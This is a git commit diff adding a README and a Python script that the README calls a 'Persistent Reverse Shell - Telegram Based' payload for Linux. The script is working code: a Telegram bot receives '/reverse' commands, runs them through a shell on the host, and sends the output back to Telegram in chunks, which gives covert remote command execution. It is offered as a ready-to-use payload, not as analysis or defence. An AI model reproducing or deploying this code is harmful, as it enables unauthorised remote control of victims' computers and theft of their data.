pull/195/head
aleff-github 2023-08-03 10:35:53 +02:00
parent 8c3ca28399
commit 72ac8927b3
2 changed files with 84 additions and 0 deletions

View File

@ -0,0 +1,41 @@
# Persistent Reverse Shell - Telegram Based
A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
**Category**: Execution
## Dependencies
* Internet Connection
## Description
A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
The script accept the `/reverse` command using the format `/reverse <shell_command>` and split `/reverse` from `<shell_command>` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`.
Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,43 @@
from telebot import TeleBot, types
import subprocess
# Set here the Telegram bot token
BOT_TOKEN = ""
bot = TeleBot(BOT_TOKEN)
commands = [
types.BotCommand("/reverse", "/reverse <shell_command>")
]
bot.set_my_commands(commands=commands)
@bot.message_handler(commands=['reverse'])
def reverse_shell(message):
command = extract_command(message.text)
if command != "":
print(f"Command received: {command}")
out = run_command(command)
if len(out) > 1000:
bot.reply_to(message, "Message too long...")
chunk_size = 1000
for i in range(0, len(out), chunk_size):
bot.send_message(message.chat.id, out[i:i+chunk_size])
else:
bot.reply_to(message, out)
def extract_command(message):
command_prefix = "/reverse"
if message.startswith(command_prefix):
return message[len(command_prefix):].strip()
else:
return None
def run_command(command):
try:
result = subprocess.check_output(command, shell=True, text=True)
return result.strip()
except subprocess.CalledProcessError as e:
return f"Some error: {e}"
bot.infinity_polling()